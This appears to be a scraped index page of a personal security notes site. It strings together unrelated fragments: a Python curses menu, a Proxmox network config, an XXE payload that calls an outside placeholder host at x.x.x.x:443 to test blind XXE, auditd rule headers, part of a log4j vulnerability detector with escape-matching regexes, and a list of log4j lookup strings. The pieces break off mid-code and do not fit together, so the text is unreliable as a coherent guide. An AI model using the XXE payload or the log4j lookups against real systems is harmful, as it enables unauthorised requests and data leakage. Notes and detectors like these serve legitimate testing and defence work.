KrE80r

The Top Hacker Methodologies & Tools Notes

By Chase. ** *

Nuclei Templates

Concrete5 CMS : Identification, Mass Hunting, Nuclei Template Writing & Reporting

My Methodology

ProxMox Cluster - Soup-to-Nutz

aka what i did to get from nothing to done.

note: these are designed to be primarily a re-install guide for myself (writing things down helps me memorize the knowledge), as such don't take any of this on blind faith - some areas are well tested and the docs are very robust, some items, less so). YMMV

Purpose of Proxmox cluster project

Required Outomces of cluster project

	#!/usr/bin/env python
	# -- coding: utf-8 --
	# Topmenu and the submenus are based of the example found at this location http://blog.skeltonnetworks.com/2010/03/python-curses-custom-menu/
	# The rest of the work was done by Matthew Bennett and he requests you keep these two mentions when you reuse the code :-)
	# Basic code refactoring by Andrew Scheller

	from time import sleep
	import curses, os #curses is the interface for capturing key presses on the menu, os launches the files
	screen = curses.initscr() #initializes a new window for capturing key presses
	curses.noecho() # Disables automatic echoing of key presses (prevents program from input each key twice)

	# /etc/network/interfaces
	#
	auto lo
	iface lo inet loopback

	# device: eth0
	iface eth0 inet manual

	# IPv4 bridge
	# (connect ONLY your firewall/router KVM instance here, this is the WAN device!)

	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>

	# Linux Audit Daemon - Best Practice Configuration
	# /etc/audit/audit.rules
	#
	# Based on rules published here:
	# Gov.uk auditd rules
	# https://github.com/gds-operations/puppet-auditd/pull/1
	# CentOS 7 hardening
	# https://highon.coffee/blog/security-harden-centos-7/#auditd---audit-daemon
	# Linux audit repo
	# https://github.com/linux-audit/audit-userspace/tree/master/rules

	#! /usr/bin/env python3

	'''
	Needs Requests (pip3 install requests)

	Author: Marcello Salvati, Twitter: @byt3bl33d3r
	License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)


	This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.

	import re
	from urllib.parse import unquote


	FLAGS = re.IGNORECASE \| re.DOTALL
	ESC_DOLLAR = r'(?:\$\|[\\%]u0024\|\|\\x24\|\\0?44\|%24)'
	ESC_LCURLY = r'(?:\{\|[\\%]u007B\|\\x7B\|\\173\|%7B)'
	ESC_RCURLY = r'(?:\}\|[\\%]u007D\|\\x7D\|\\175\|%7D)'
	_U_PERCENT_ESCAPE_RE = re.compile(r'%(u[0-9a-f]{4})', flags=FLAGS)
	_PERCENT_ESCAPE_RE = re.compile(r'%[0-9a-f]{2}', flags=FLAGS)

	${ctx:loginId}
	${map:type}
	${filename}
	${date:MM-dd-yyyy}
	${docker:containerId}
	${docker:containerName}
	${docker:imageName}
	${env:USER}
	${event:Marker}
	${mdc:UserId}